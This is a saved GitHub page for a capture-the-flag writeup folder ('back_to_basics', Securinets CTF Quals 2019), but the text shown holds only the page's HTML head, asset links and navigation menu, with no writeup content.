<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>CTFs/Securinets-CTF-QUALS-2019/back_to_basics at master · AnisBoss/CTFs · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="D389:380B:44101B5:459AA32:64122506" data-pjax-transient="true"/><meta name="html-safe-nonce" content="9361b8af198ae7efedab9040c2d5bf21abfb4fefe23b7b94c88d27b23fc878b0" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJEMzg5OjM4MEI6NDQxMDFCNTo0NTlBQTMyOjY0MTIyNTA2IiwidmlzaXRvcl9pZCI6IjE4ODQwNzczMDgzMjQ3NTA1OTgiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="6b663b88191550c2a0aa25ce2aed115fe0d1e4cbafb93daf7759a0a5da94b920" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:102334842" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="This repo contains some writeups made by me during multiples CTFs. - CTFs/Securinets-CTF-QUALS-2019/back_to_basics at master · AnisBoss/CTFs"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/863692b7d1fafc9d284ec0be60dc600f500cbcd2ad5ac766424bb7647f208db7/AnisBoss/CTFs" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTFs/Securinets-CTF-QUALS-2019/back_to_basics at master · AnisBoss/CTFs" /><meta name="twitter:description" content="This repo contains some writeups made by me during multiples CTFs. - CTFs/Securinets-CTF-QUALS-2019/back_to_basics at master · AnisBoss/CTFs" /> <meta property="og:image" content="https://opengraph.githubassets.com/863692b7d1fafc9d284ec0be60dc600f500cbcd2ad5ac766424bb7647f208db7/AnisBoss/CTFs" /><meta property="og:image:alt" content="This repo contains some writeups made by me during multiples CTFs. - CTFs/Securinets-CTF-QUALS-2019/back_to_basics at master · AnisBoss/CTFs" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTFs/Securinets-CTF-QUALS-2019/back_to_basics at master · AnisBoss/CTFs" /><meta property="og:url" content="https://github.com/AnisBoss/CTFs" /><meta property="og:description" content="This repo contains some writeups made by me during multiples CTFs. - CTFs/Securinets-CTF-QUALS-2019/back_to_basics at master · AnisBoss/CTFs" /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/AnisBoss/CTFs git https://github.com/AnisBoss/CTFs.git">
<meta name="octolytics-dimension-user_id" content="11429289" /><meta name="octolytics-dimension-user_login" content="AnisBoss" /><meta name="octolytics-dimension-repository_id" content="102334842" /><meta name="octolytics-dimension-repository_nwo" content="AnisBoss/CTFs" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="102334842" /><meta name="octolytics-dimension-repository_network_root_nwo" content="AnisBoss/CTFs" />
<link rel="canonical" href="https://github.com/AnisBoss/CTFs/tree/master/Securinets-CTF-QUALS-2019/back_to_basics" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
